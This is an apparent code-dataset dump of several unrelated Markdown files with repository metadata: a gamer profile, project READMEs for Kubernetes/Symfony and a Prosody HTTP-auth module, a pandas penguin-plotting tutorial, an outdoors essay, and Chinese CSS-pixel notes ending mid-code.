hexsha
stringlengths
40
40
size
int64
5
1.04M
ext
stringclasses
6 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
344
max_stars_repo_name
stringlengths
5
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
11
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
344
max_issues_repo_name
stringlengths
5
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
11
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
344
max_forks_repo_name
stringlengths
5
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
11
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
5
1.04M
avg_line_length
float64
1.14
851k
max_line_length
int64
1
1.03M
alphanum_fraction
float64
0
1
lid
stringclasses
191 values
lid_prob
float64
0.01
1
6f42dadef374163324cf933d32d29645b50ac5cb
1,134
md
Markdown
player/daigo_umehara.md
hifight/hifight.github.io
83aec1bb98fae1e7bc896c9854228f30c4b1d859
[ "MIT" ]
2
2018-05-20T18:12:31.000Z
2018-09-08T07:28:54.000Z
player/daigo_umehara.md
hifight/hifight.github.io
83aec1bb98fae1e7bc896c9854228f30c4b1d859
[ "MIT" ]
null
null
null
player/daigo_umehara.md
hifight/hifight.github.io
83aec1bb98fae1e7bc896c9854228f30c4b1d859
[ "MIT" ]
null
null
null
--- layout: player title: "Daigo Umehara" moment_link: "https://twitter.com/i/moments/991638553229578240?ref_src=twsrc%5Etfw" profile_pic: daigo_umehara.jpg profile_gfy: WeirdFrigidIncatern article_gfy: IllShadyHog twitter: "https://twitter.com/daigothebeast" twitch: "https://www.twitch.tv/daigothebeastv" hifight: UmeShoryu, UmeFlash, UmeNeutral --- Also known as "The Beast". Twitch's first global ambassador, sponsored by Red Bull、HyperX、Cy Games、NSURGO in 2017. Currently holds a world record of "the most successful player in major tournaments of Street Fighter" in Guinness World Records. Considered the strongest Street Fighter player in long set (FT7-FT10) where he has time to prepare for specific character/player match up. He beat Infiltration, Xian, Momochi and Tokido in a long set convincingly after they won EVO. Outside of competing Daigo is also doing a lot of side project with his BeasTV twitch channel, like Donation Colosseum or Kemonomichi where he setup an exhibition match that people wanted to see. <hr/> <h3>Characters</h3> Street Fighter IV: Ryu, Yun, Evil Ryu Street Fighter V: Ryu, Guile
34.363636
100
0.787478
eng_Latn
0.984858
6f43777e889aebd4b706d87e9edcb0ac5497a724
166
md
Markdown
README.md
MoshBit/Student-Scholarship-Portal
d28a2a125c25006bde1f509ff21cb0ce12d18490
[ "MIT" ]
null
null
null
README.md
MoshBit/Student-Scholarship-Portal
d28a2a125c25006bde1f509ff21cb0ce12d18490
[ "MIT" ]
null
null
null
README.md
MoshBit/Student-Scholarship-Portal
d28a2a125c25006bde1f509ff21cb0ce12d18490
[ "MIT" ]
null
null
null
# Student-Scholarship-Portal DBMS project Spring'21<br/> A basic web application developed using PHP and MySql in partial fulfillment of the course Database Systems.
41.5
108
0.819277
eng_Latn
0.922255
6f43f1a508dd5918f49b525cfef8b60f560d6113
12,020
md
Markdown
_posts/2021-10-05-BlogPost0.md
elliotshin/elliotshin.github.io
0df26b3da438d0ac62b8d6b93ef2842ec76f8741
[ "MIT" ]
null
null
null
_posts/2021-10-05-BlogPost0.md
elliotshin/elliotshin.github.io
0df26b3da438d0ac62b8d6b93ef2842ec76f8741
[ "MIT" ]
null
null
null
_posts/2021-10-05-BlogPost0.md
elliotshin/elliotshin.github.io
0df26b3da438d0ac62b8d6b93ef2842ec76f8741
[ "MIT" ]
null
null
null
--- layout: post title: Blog Post 0 --- ## Introduction Hi! My Name is Elliot Shin, and today I will be guiding you through creating a data visualization using the Palmer Penguins pandas dataframe! No need to be alarmed, as we will only be looking at Penguins, and not pandas. Pandas simply refers to the package in python that makes working with data a little bit easier. It also comes with some cool useful functions for creating plots! ## Step 1: Importing the Data First, we need to get the data! ```python import pandas as pd from matplotlib import pyplot as plt url = "https://raw.githubusercontent.com/PhilChodrow/PIC16B/master/datasets/palmer_penguins.csv" penguins = pd.read_csv(url) ``` The first line is us importing the pandas package and renaming it pd for the purposes of this assignment. This is the conventional style, as it saves some time (plus all the posts on stack overflow regarding pandas refer to it as pd as well). The second line, much like the first, is another package we will use later on for plotting! ## Step 2: Data Inspection Now we need to explore what our data looks like and gain some insight as to what variables we can work with. ```python penguins.head(10) #show the first ten rows of the penguins dataframe ``` <div> <style scoped> .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } </style> <table border="1" class="dataframe"> <thead> <tr style="text-align: right;"> <th></th> <th>studyName</th> <th>Sample Number</th> <th>Species</th> <th>Region</th> <th>Island</th> <th>Stage</th> <th>Individual ID</th> <th>Clutch Completion</th> <th>Date Egg</th> <th>Culmen Length (mm)</th> <th>Culmen Depth (mm)</th> <th>Flipper Length (mm)</th> <th>Body Mass (g)</th> <th>Sex</th> <th>Delta 15 N (o/oo)</th> <th>Delta 13 C (o/oo)</th> <th>Comments</th> </tr> </thead> <tbody> <tr> <th>0</th> <td>PAL0708</td> <td>1</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N1A1</td> <td>Yes</td> <td>11/11/07</td> <td>39.1</td> <td>18.7</td> <td>181.0</td> <td>3750.0</td> <td>MALE</td> <td>NaN</td> <td>NaN</td> <td>Not enough blood for isotopes.</td> </tr> <tr> <th>1</th> <td>PAL0708</td> <td>2</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N1A2</td> <td>Yes</td> <td>11/11/07</td> <td>39.5</td> <td>17.4</td> <td>186.0</td> <td>3800.0</td> <td>FEMALE</td> <td>8.94956</td> <td>-24.69454</td> <td>NaN</td> </tr> <tr> <th>2</th> <td>PAL0708</td> <td>3</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N2A1</td> <td>Yes</td> <td>11/16/07</td> <td>40.3</td> <td>18.0</td> <td>195.0</td> <td>3250.0</td> <td>FEMALE</td> <td>8.36821</td> <td>-25.33302</td> <td>NaN</td> </tr> <tr> <th>3</th> <td>PAL0708</td> <td>4</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N2A2</td> <td>Yes</td> <td>11/16/07</td> <td>NaN</td> <td>NaN</td> <td>NaN</td> <td>NaN</td> <td>NaN</td> <td>NaN</td> <td>NaN</td> <td>Adult not sampled.</td> </tr> <tr> <th>4</th> <td>PAL0708</td> <td>5</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N3A1</td> <td>Yes</td> <td>11/16/07</td> <td>36.7</td> <td>19.3</td> <td>193.0</td> <td>3450.0</td> <td>FEMALE</td> <td>8.76651</td> <td>-25.32426</td> <td>NaN</td> </tr> <tr> <th>5</th> <td>PAL0708</td> <td>6</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N3A2</td> <td>Yes</td> <td>11/16/07</td> <td>39.3</td> <td>20.6</td> <td>190.0</td> <td>3650.0</td> <td>MALE</td> <td>8.66496</td> <td>-25.29805</td> <td>NaN</td> </tr> <tr> <th>6</th> <td>PAL0708</td> <td>7</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N4A1</td> <td>No</td> <td>11/15/07</td> <td>38.9</td> <td>17.8</td> <td>181.0</td> <td>3625.0</td> <td>FEMALE</td> <td>9.18718</td> <td>-25.21799</td> <td>Nest never observed with full clutch.</td> </tr> <tr> <th>7</th> <td>PAL0708</td> <td>8</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N4A2</td> <td>No</td> <td>11/15/07</td> <td>39.2</td> <td>19.6</td> <td>195.0</td> <td>4675.0</td> <td>MALE</td> <td>9.46060</td> <td>-24.89958</td> <td>Nest never observed with full clutch.</td> </tr> <tr> <th>8</th> <td>PAL0708</td> <td>9</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N5A1</td> <td>Yes</td> <td>11/9/07</td> <td>34.1</td> <td>18.1</td> <td>193.0</td> <td>3475.0</td> <td>NaN</td> <td>NaN</td> <td>NaN</td> <td>No blood sample obtained.</td> </tr> <tr> <th>9</th> <td>PAL0708</td> <td>10</td> <td>Adelie</td> <td>Anvers</td> <td>Torgersen</td> <td>Adult, 1 Egg Stage</td> <td>N5A2</td> <td>Yes</td> <td>11/9/07</td> <td>42.0</td> <td>20.2</td> <td>190.0</td> <td>4250.0</td> <td>NaN</td> <td>9.13362</td> <td>-25.09368</td> <td>No blood sample obtained for sexing.</td> </tr> </tbody> </table> </div> We can see that the datset has variables such as species name, Island, culmen length and depth, sex, etc. We can also see the summary statistics for the numerical variables using this line of code: ```python penguins.describe() ``` <div> <style scoped> .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } </style> <table border="1" class="dataframe"> <thead> <tr style="text-align: right;"> <th></th> <th>Sample Number</th> <th>Culmen Length (mm)</th> <th>Culmen Depth (mm)</th> <th>Flipper Length (mm)</th> <th>Body Mass (g)</th> <th>Delta 15 N (o/oo)</th> <th>Delta 13 C (o/oo)</th> </tr> </thead> <tbody> <tr> <th>count</th> <td>344.000000</td> <td>342.000000</td> <td>342.000000</td> <td>342.000000</td> <td>342.000000</td> <td>330.000000</td> <td>331.000000</td> </tr> <tr> <th>mean</th> <td>63.151163</td> <td>43.921930</td> <td>17.151170</td> <td>200.915205</td> <td>4201.754386</td> <td>8.733382</td> <td>-25.686292</td> </tr> <tr> <th>std</th> <td>40.430199</td> <td>5.459584</td> <td>1.974793</td> <td>14.061714</td> <td>801.954536</td> <td>0.551770</td> <td>0.793961</td> </tr> <tr> <th>min</th> <td>1.000000</td> <td>32.100000</td> <td>13.100000</td> <td>172.000000</td> <td>2700.000000</td> <td>7.632200</td> <td>-27.018540</td> </tr> <tr> <th>25%</th> <td>29.000000</td> <td>39.225000</td> <td>15.600000</td> <td>190.000000</td> <td>3550.000000</td> <td>8.299890</td> <td>-26.320305</td> </tr> <tr> <th>50%</th> <td>58.000000</td> <td>44.450000</td> <td>17.300000</td> <td>197.000000</td> <td>4050.000000</td> <td>8.652405</td> <td>-25.833520</td> </tr> <tr> <th>75%</th> <td>95.250000</td> <td>48.500000</td> <td>18.700000</td> <td>213.000000</td> <td>4750.000000</td> <td>9.172123</td> <td>-25.062050</td> </tr> <tr> <th>max</th> <td>152.000000</td> <td>59.600000</td> <td>21.500000</td> <td>231.000000</td> <td>6300.000000</td> <td>10.025440</td> <td>-23.787670</td> </tr> </tbody> </table> </div> Let's see if we can spot any differences between the different species types and their respective statistics. ## Step 3: How Many Species are there? So we want to group our data by species type, the next logical question is: "How many different types of species are there and what are they?" First we want to just get the first word from the species variable, to do so, let's alter the "Species" column of the penguin dataset ```python penguins["Species"] = penguins["Species"].str.split().str.get(0) #retrieve the first word of the Species column ``` Wow! Looks complex doesn't it? It is actually a really simple line of code if you know your data types and functions Essentially, since each penguin is recorded as ___ penguin, we just want the ___ . This code extracts the first word of each value in the Species column by turning the whole entry into a list and just getting the first element of that list. Now we want to figure out how many unique values are present in the species column. Good thing there is a data type that does just that! Set! ```python species_set = set(penguins["Species"]) #create a set of unique values out of all the species values species_set ``` ``` {'Adelie', 'Chinstrap', 'Gentoo'} ``` Turns out that there are 3 unique types of species: Adelie, Chinstrap, and Gentoo! ## Step 4: Plotting Let's see the relationship between culmen depth and culmen length for between each species! ```python fig, ax = plt.subplots(1) #create one subplot object, which returns two things:a figure and an axis, which we have aptly named for x in species_set: #for each unique species name (Adelie, Chinstrap, Gentoo) do the following length = penguins["Culmen Length (mm)"] depth = penguins["Culmen Depth (mm)"] mask = penguins["Species"] == x #make a mask for species ax.scatter(length[mask],depth[mask], label = x, alpha = 0.5) #plot based on mask ax.set(xlabel = "Culmen Length (mm)", ylabel = "Culmen Depth (mm)") #set axis labels ax.legend() #since we set the label based on x, our species in the species_set, the legend should generate based on that ``` ![plot_blog0.png](/images/plot_blog0.png) Let's break down this chunk of code. First we create a figure object and axis for the plot that we just made. Next we created a for loop to plot culmen length and culmen dpeth PER species. In order to do so, we need to create a **mask**. This is a conditional statement that limits what we want to look at. The mask in this example is Species name. So for each species group, we say: "only plot culmen length and culmen depth if their corresponding species name is __ " (in the blank goes one of the three species names). Let's take a look at all the functions performed on our ax object: - ax.scatter() is a function that is applied onto our ax object that tells it to plot a scatter plot. - ax.set() creates the axis labels for our plot. - ax.legend() creates a legend based on our species, since we divided our plot based on species. There you have it prospective PIC 16A student! Not too difficult, right?
27.072072
522
0.564309
eng_Latn
0.7367
6f44089f3ae47b05a6a9b599f28602db092ce5fb
1,490
md
Markdown
README.md
carlosas/kfs-test
fa1f9d893ceb0f4daf7541a9cba6dd4734fd6b72
[ "MIT" ]
20
2017-10-17T09:34:59.000Z
2021-06-15T17:43:40.000Z
README.md
carlosas/kfs-test
fa1f9d893ceb0f4daf7541a9cba6dd4734fd6b72
[ "MIT" ]
null
null
null
README.md
carlosas/kfs-test
fa1f9d893ceb0f4daf7541a9cba6dd4734fd6b72
[ "MIT" ]
5
2017-12-11T10:07:32.000Z
2019-03-13T19:48:21.000Z
# Kubernetes for Symfony [![license](https://img.shields.io/github/license/mashape/apistatus.svg?style=flat-square)](LICENSE) [![contributions](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat-square)](https://github.com/carlosas/kubernetes-for-symfony/issues) [![HitCount](http://hits.dwyl.com/carlosas/kubernetes-for-symfony.svg)](README.md) ![](doc/schema.png) --- WARNING :warning: **This project is no longer maintained (for now)** --- ## Introduction This stack is a starting point for building a distributed and scalable stack with Kubernetes. It runs locally with Minikube, but it can be modified to use AWS or GCE. Any contribution in this direction would be appreciated. ## Quick guide ### Requirements * kubectl https://kubernetes.io/docs/tasks/tools/install-kubectl/ * minikube https://kubernetes.io/docs/tasks/tools/install-minikube/ ### Usage #### Build and start the stack: * Define your passwords in *kubernetes/secrets.yaml*, encrypted in base64: ```sh echo -n "MYPASSWORD" | base64 ``` > For Jenkins encrypt: `--argumentsRealm.passwd.jenkins=MYPASSWORD --argumentsRealm.roles.jenkins=admin` * Start the stack ```sh ./scripts/start-and-create.sh ``` * Create local persistent volumes ```sh ./scripts/create-persistent-volumes.sh ``` * Clone your repository into the stack *(set 'mysql' as database host)* ```sh ./scripts/clone-my-repository.sh ``` #### Clean up and stop the stack: ```sh ./scripts/stop-and-delete.sh ```
24.42623
223
0.736242
eng_Latn
0.649154
6f4423a5f8a21f427d28d527aa097725cc11e113
1,513
md
Markdown
biztalk/core/single-sign-on-event-10564.md
OPS-E2E-PPE/biztalk-docs.ja-JP
5e8314d59a5aa91e3eb4a20c1bdbc75821170d17
[ "CC-BY-4.0", "MIT" ]
null
null
null
biztalk/core/single-sign-on-event-10564.md
OPS-E2E-PPE/biztalk-docs.ja-JP
5e8314d59a5aa91e3eb4a20c1bdbc75821170d17
[ "CC-BY-4.0", "MIT" ]
null
null
null
biztalk/core/single-sign-on-event-10564.md
OPS-E2E-PPE/biztalk-docs.ja-JP
5e8314d59a5aa91e3eb4a20c1bdbc75821170d17
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: シングル サインオン:イベント 10564 |Microsoft Docs ms.custom: '' ms.date: 06/08/2017 ms.prod: biztalk-server ms.reviewer: '' ms.suite: '' ms.tgt_pltfrm: '' ms.topic: article ms.assetid: e523c97a-608e-4bf4-8747-cfa0cce10acf caps.latest.revision: 7 author: MandiOhlinger ms.author: mandia manager: anneta ms.openlocfilehash: 9ddea5def52677643930d215bd17a82359b55d90 ms.sourcegitcommit: 381e83d43796a345488d54b3f7413e11d56ad7be ms.translationtype: MT ms.contentlocale: ja-JP ms.lasthandoff: 05/07/2019 ms.locfileid: "65398799" --- # <a name="single-sign-on-event-10564"></a>シングル サインオン:イベント 10564 ## <a name="details"></a>詳細 | | | |-----------------|------------------------------------------------------------| | 製品名 | エンタープライズ シングル サインオン | | 製品バージョン | [!INCLUDE[btsSSOVersion](../includes/btsssoversion-md.md)] | | イベント ID | 10564 | | イベント ソース | ENTSSO | | コンポーネント | なし | | シンボル名 | SSO_ERROR_BACKUP_FILE_INCORRECT_FORMAT | | メッセージ テキスト | バックアップ ファイルには、正しい形式はありません。 | ## <a name="explanation"></a>説明 バックアップ ファイルには、正しい形式はありません。 ## <a name="user-action"></a>ユーザーの操作 正しいファイル名と場所があることを確認します。 そのフォルダー内の他のファイルがないことを確認する必要がありますもします。BAK の拡張機能は、ENTSSO システムとして可能性がありますと混同する実際のバックアップ ファイル。
38.794872
115
0.548579
yue_Hant
0.541731
6f442a94453d580d41fabca692206a863bf8009e
2,540
markdown
Markdown
mod_auth_http/README.markdown
gbeine/prosody-modules
6aaadbec259a52a2380882cb18964e83b55fb645
[ "MIT" ]
null
null
null
mod_auth_http/README.markdown
gbeine/prosody-modules
6aaadbec259a52a2380882cb18964e83b55fb645
[ "MIT" ]
null
null
null
mod_auth_http/README.markdown
gbeine/prosody-modules
6aaadbec259a52a2380882cb18964e83b55fb645
[ "MIT" ]
null
null
null
--- labels: - Stage-Alpha summary: "Authenticate users against an external HTTP API" ... # Overview This authentication module allows Prosody to authenticate users against an external HTTP service. # Configuration ``` lua VirtualHost "example.com" authentication = "http" http_auth_url = "http://example.com/auth" ``` If the API requires Prosody to authenticate, you can provide static credentials using HTTP Basic authentication, like so: ``` http_auth_credentials = "prosody:secret-password" ``` # Developers This section contains information for developers who wish to implement a HTTP service that Prosody can use for authentication. ## Protocol Prosody will make a HTTP request to the configured API URL with an appended `/METHOD` where `METHOD` is one of the methods described below. GET methods must expect a series of URL-encoded query parameters, while POST requests will receive an URL-encoded form (i.e. `application/x-www-form-urlencoded`). ## Parameters user : The username, e.g. `stephanie` for the JID `stephanie@example.com`. server : The host part of the user's JID, e.g. `example.com` for the JID `stephanie@example.com`. pass : For methods that verify or set a user's password, the password will be supplied in this parameter, otherwise it is not set. ## Methods The only mandatory methods that the service must implement are `check_password` and `user_exists`. Unsupported methods should return a HTTP status code of `501 Not Implemented`, but other error codes will also be handled by Prosody. ### register **HTTP method:** : POST **Success codes:** : 201 **Error codes:** : 409 (user exists) ### check_password **HTTP method:** : GET **Success codes:** : 200 **Response:** : A text string of `true` if the user exists, or `false` otherwise. ### user_exists **HTTP method:** : GET **Success codes:** : 200 **Response:** : A text string of `true` if the user exists, or `false` otherwise. ### set_password **HTTP method:** : POST **Success codes:** : 200, 201, or 204 ### remove_user **HTTP method:** : POST **Success codes:** : 200, 201 or 204 ## Examples With the following configuration: ``` authentication = "http" http_auth_url = "https://auth.example.net/api" If a user connects and tries to log in to Prosody as "romeo@example.net" with the password "iheartjuliet", Prosody would make the following HTTP request: ``` https://auth.example.net/api/check_password?user=romeo&server=example.net&pass=iheartjuliet ``` # Compatibility Requires Prosody 0.11.0 or later.
19.689922
91
0.73189
eng_Latn
0.976479
6f44410706f6535b887c1af6db0e2db057c3616f
5,078
md
Markdown
content/ponder/thought-2018-02-27-why-be-an-outdoors-man-daily-ponders-4.md
jlrude91/RudeThoughts
5877e8103387b7703ff527ba6a77354f5edbb96c
[ "Apache-2.0" ]
null
null
null
content/ponder/thought-2018-02-27-why-be-an-outdoors-man-daily-ponders-4.md
jlrude91/RudeThoughts
5877e8103387b7703ff527ba6a77354f5edbb96c
[ "Apache-2.0" ]
null
null
null
content/ponder/thought-2018-02-27-why-be-an-outdoors-man-daily-ponders-4.md
jlrude91/RudeThoughts
5877e8103387b7703ff527ba6a77354f5edbb96c
[ "Apache-2.0" ]
null
null
null
--- title: Why be an Outdoors Man? draft: false date: 2018-02-27T16:18:26.000Z author: Jerry Rude authorAvatar: uploads/author_JerryRude.jpg image: /uploads/14908297_10210878985115859_5059444685567478332_n.jpg categories: ponder tags: - Outdoors Man - Nature - Hunting - Daily Ponders comments: true share: true type: post --- Its spring time, deer season is over and next in line are turkey and morel mushrooms. Like basically all of my articles, why is the question, why is it that I get out and do the things that I do? Getting up, sometimes hours before the sun rises. Sitting in the cold and wet, trying to hold in any warmth that I can with layers of camo and a thermos of coffee. I love it, being out in nature is hard to describe really. Those that do it and have done it can relate to this feeling, but describing it to the unexposed, basically impossible. For me, I can take that one step further, and higher. The mountains of Appalachia is where I really feel it. When you get away from the lights of the city, you can still hear the cars on the highway. You get away from the the noises of the highway, and your phone still has service. You get into the hills of Appalachia, you are truly alone. You breathe the air differently, they sky is a different blue, the nighttime stars.....simply unimaginable. From an economic viewpoint this seems inefficient, a waste of time, resources, and money. We wont get into the economic discussion of what makes you happy and why you do those things today. I will be making my argument for the outdoors man. Why I believe everyone should at least take sometime out of their day, week, month, and venture into the wild. To begin, I don't currently own a tent, though I have in the past. You don't need a map, a compass, you don't need to hunt, you don't have to do so much as put mud on your boots to enjoy the open and wild wilderness. Everyone in this country is a public land owner. The taxes you pay go towards the maintenance of public lands, to be used at your discretion (to a degree). Why not use them? Go for a walk at your reservoir, learn how to fish, take your kids to nature parks. You already pay for all of this, why not use it? Exercise, generally you need to be physically fit to some degree to do the things mentioned. You don't need to become physically fit to do them though. It starts with a short walk, then you start completing the mile loop. Next you're incorporating the stairs and before you know it you're going on half day hikes. Unless your hobbies currently include some kind of fitness bettering regiment to them, I think we all could agree that America could focus a little more on over all health. Say you do want to fish or hunt. For the minimum necessary, and not buying top of the line everything, you can spend $150 (this could even be lower if you bought used) for some fishing gear and licenses and have a meal a week covered for a year. The price point goes up a bit to get into hunting, but not too much, and if you're successful, your reward is often much greater. Look at my last few years of deer hunting. Unfortunately I cant include this year as I did not harvest a deer. The two years before that, I spent $300 on a bow and arrows, about $50 on tags, $40 on a tree stand, and about $250 on butchering. What did I get, I totaled out over 150 lbs of meat. This includes roasts, steaks, ground, summer sausage, jerky, brats, and more. Also the license covered hunting rabbit, squirrel, dove, turkey, and other small game. In total I bagged close to 175 lbs of meat and spent a little under $650. That's about $3.70/lbs of the most lean, free range, healthy meat you could ever have. This also does not include any of my fishing success which would overall lower that final per pound cost. You could butcher the meat yourself as well (as I've done in the past but requires more time than I have to devote to it right now) to cut that price nearly in half. We all could benefit from the outdoors a little more. Go bird watch, use the bike trails, kayak, rock climb, anything really. On top of all that has been mentioned, I strongly believe that if more people incorporated the outdoor into their lives, we would see a vast improvement in our societies. An overall increase in the demand to reduce pollution, an overall heightened level of social values and morals (this I believe would stem from seeing more people and animals live their everyday lives strengthening the sense of community), and people just being happier in general are just a few. The consequences of all this, maybe everyone's health insurance premiums go down because overall health goes up. Those expensive health stores that sell the local farmers food get a little cheaper because we start getting serious about the food we put in our bodies instead of ignorantly sharing news articles about GMOs while simultaneously shoving fast food fat burgers and liters of soda down our throats. Get away from your phone, stop reading this, walk to your local park and just get outside, what do you have to lose?
220.782609
2,279
0.782198
eng_Latn
0.999923
6f4448c914f2e2cef7a82ffa07f5d024f3484585
172,479
md
Markdown
_posts/2018-11-14-need-do.md
yuccie/jsArt
230be63f78bfa403cf469ab80236f5a3284e6e96
[ "CC-BY-4.0" ]
null
null
null
_posts/2018-11-14-need-do.md
yuccie/jsArt
230be63f78bfa403cf469ab80236f5a3284e6e96
[ "CC-BY-4.0" ]
1
2020-06-14T13:41:18.000Z
2020-06-14T13:41:18.000Z
_posts/2018-11-14-need-do.md
yuccie/jsArt
230be63f78bfa403cf469ab80236f5a3284e6e96
[ "CC-BY-4.0" ]
1
2019-05-20T09:13:03.000Z
2019-05-20T09:13:03.000Z
--- layout: post title: 凡是过往,皆为序章 date: Fri May 10 2019 17:25:50 GMT+0800 (中国标准时间) --- >写在前面:平时开发中总是遇见相同的问题,但很多时候都需要重新查找相关资料才可以,不但浪费了时间,而且每次都有种重新开始的感觉。。。因此将这些常见问题总结在一起,后续再有相关问题,都将其归为一类进行总结对比学习。 参考:[前端资源汇总(掘金)][allFrontEndResourceUrl]、[你可能需要的前端知识点][frontEndResourceOneUrl]、[中高级葵花宝典][middleAndHighLevelIterviewUrl]、[JavaScript开发者应懂的33个概念][jsEngineerShouldKonw33Concept]、[关于js你需要知道的][aboutJsYouNeedKonw]、[浏览器的工作原理幕后解密][howBrowsersworkUrl] #### ***显示设备相关*** ***css像素*** 参考:[css、物理、设备、独立设备像素][cssPxDevicePxUrl] 浏览器里的一切长度都是css像素为单位,css像素的单位是px(pixel像素的缩写),他是图像显示的基本单元,**既不是一个确定的物理量,也不是一个点或者小方块,而是一个抽象概念**。。。 ***注意:***物理像素其实就等价于设备像素 在css规范中,单位有相对和绝对之分,而px就是一个相对单位,相对的是**设备像素(device pixel)** 在同一个设备或不同的设备上,**每一个css像素所代表的物理像素是可以变化的**。。。 不同的设备,图像基本采集单元是不同的,显示器上的物理像素等于显示器的点距,而打印机的物理像素等于打印机的墨点,而衡量二者的单位分别为ppi和dpi。 **ppi:**每英寸(2.54cm)多少像素数,放到显示器上说的是每英寸多少物理像素及显示器设备的点距。 **dpi:**每英寸(2.54cm)多少点 由于不同设备的物理像素的大小是不一样的,**所以css规范认为,浏览器应该对css像素进行调节,使得浏览器中1css像素的大小在不同设备上看上去大小总是差不多的**。。。为了达到这一点,浏览器可以直接根据设备的物理像素大小进行换算。 由于css像素是视角像素,所以在真正实现时,为了方便都是根据设备像素换算的,浏览器根据硬件设备能够直接获取css像素(也就是dpr)。 假设我们用pc浏览器打开一个页面,浏览器此时的宽度为800px,页面上有一个400px宽的块级容器,则此时块级容器占屏幕一半,若放大(cmd加上+)200%,也就是原来的两倍,此时块状容器则横向占满整个浏览器 另外body的样式属性zoom效果和(cmd加+)效果一样,只是如果用zoom修改了屏幕大小,需要再用尺寸/zoom才是真实的大小。。。 ```js // getComputedStyle返回计算后的属性对象集合 document.body.style.zoom = 0.8 var zoomVal = window.getComputedStyle(document.body).zoom; newHeight = window.innerHeight / zoomVal ``` 此时我们没有调整浏览器窗口大小,也没有改变块状容器的css宽度,但是却看上去变大了一倍。。。这是因为**我们把css像素放大了两倍**(css像素代表的物理像素数是可以变化的) 正常情况下,css像素与屏幕像素是1:1的关系,但浏览器的放大操作让这个比例发生了变化,也就是现在1css像素 = 2个设备像素,而设备像素的密度是不会变化的,出厂便确定(单位pt,绝对单位),因此放大2倍的容器就占满了整个屏幕。 **dpr:**DPR = 设备像素 / css像素 其实,还有dip,也就是设备独立像素(顾名思义是独立于设备之外的像素),也叫逻辑像素,其实也就是css像素。。。 所以:CSS像素 = 设备独立像素 = 逻辑像素 在移动端浏览器及某些桌面浏览器中,window对象有`devicePixelRatio`属性,也就是`devicePixelRatio = 物理像素 / 独立像素`。在mac上打印这个值为2,而普通的浏览器是1,这就是所谓的Retina屏。。。**另外需要注意,当缩放浏览器窗口后,在终端打印出来的devicePixelRatio会变化**,因为此时独立像素发生了变化,本来1px = 两个设备像素,放大之后,比如1px = 四个设备像素了,缩小则正好相反。其实可以想象,一个1px宽的色块,放大2倍后,看起来比之前大一倍,而物理像素不变,css像素只能变大,同样`devicePixelRatio`也会变大。 看下图: ![dpr&ppi](/jsArt/assets/images/js-theory/dpr-ppi.png) 如果对于一个页面,我们分别放在不同devicePixelRatio的设备上,就会出现上图的效果。也就是说,高devicePixelRatio的设备上ppi(像素点密度)更大,每个物理像素点更小更密集,因此此时显示就小又清晰。。。 然而在现实中,这两者效果却是一样的。这是因为Retina屏幕把2x2个像素当1个像素使用。比如原本44像素高的顶部导航栏,在Retina屏上用了88个像素的高度来显示。导致界面元素都变成2倍大小,反而看起来效果一样了,但画质更清晰。。。 那手机端如果直接用px做单位,岂不是也可以自动根据`devicePixelRatio`转换为对应的物理像素,也就没有适配问题了啊? ***1px像素边框问题*** 在非高倍屏上,其实css像素与物理像素(设备像素)比例是1:1,因此不会有常说的1px问题,但是到高倍屏上,1px这个css像素代表不再是1个设备像素,而是多个设备像素。。。因此会出现1px看起来粗的问题,想解决可以缩放,还可以border-shadow,还可以根据设备dpr动态设置border,还可以根据dpr动态设置view-port标签的intial-scale,maximum-scale,minmum-scale的值(1/dpr)等实现 **其实**问题就是1px表示的设备像素多了,因此想法让1px表示的减少即可,比如缩放,比如根据dpr动态设置。如果直接设置0.5px,0.33px可能每个浏览器处理的方式不同,如果都设置为1px,就会出现1px边框问题。 ```css /* 1、媒体查询这个后续会成为标准 */ .border { border: 1px solid #999 } @media screen and (-webkit-min-device-pixel-ratio: 2) { .border { border: 0.5px solid #999 } } @media screen and (-webkit-min-device-pixel-ratio: 3) { .border { border: 0.333333px solid #999 } } /* 2、利用阴影 */ .border-1px{ box-shadow: 0px 0px 1px 0px red inset; } /* 3、利用伪类加transform(即Y轴缩放)*/ .scale-1px{ position: relative; border:none; } .scale-1px:after{ content: ''; position: absolute; bottom: 0; background: #000; width: 100%; height: 1px; transform: scaleY(0.5); transform-origin: 0 0; } /* 4、其实淘宝的策略也可解决,根据dpr动态设置initial-scale,maximum-scale,minimum-scale的值(1/dpr) */ /* 但这样的话,岂不是将页面内所有的元素都缩放了?就应该都缩放? */ ``` ```js // 5、新方式 // detect 0.5px supports if (dpr >= 2) { var fakeBody = document.createElement('body') var testElement = 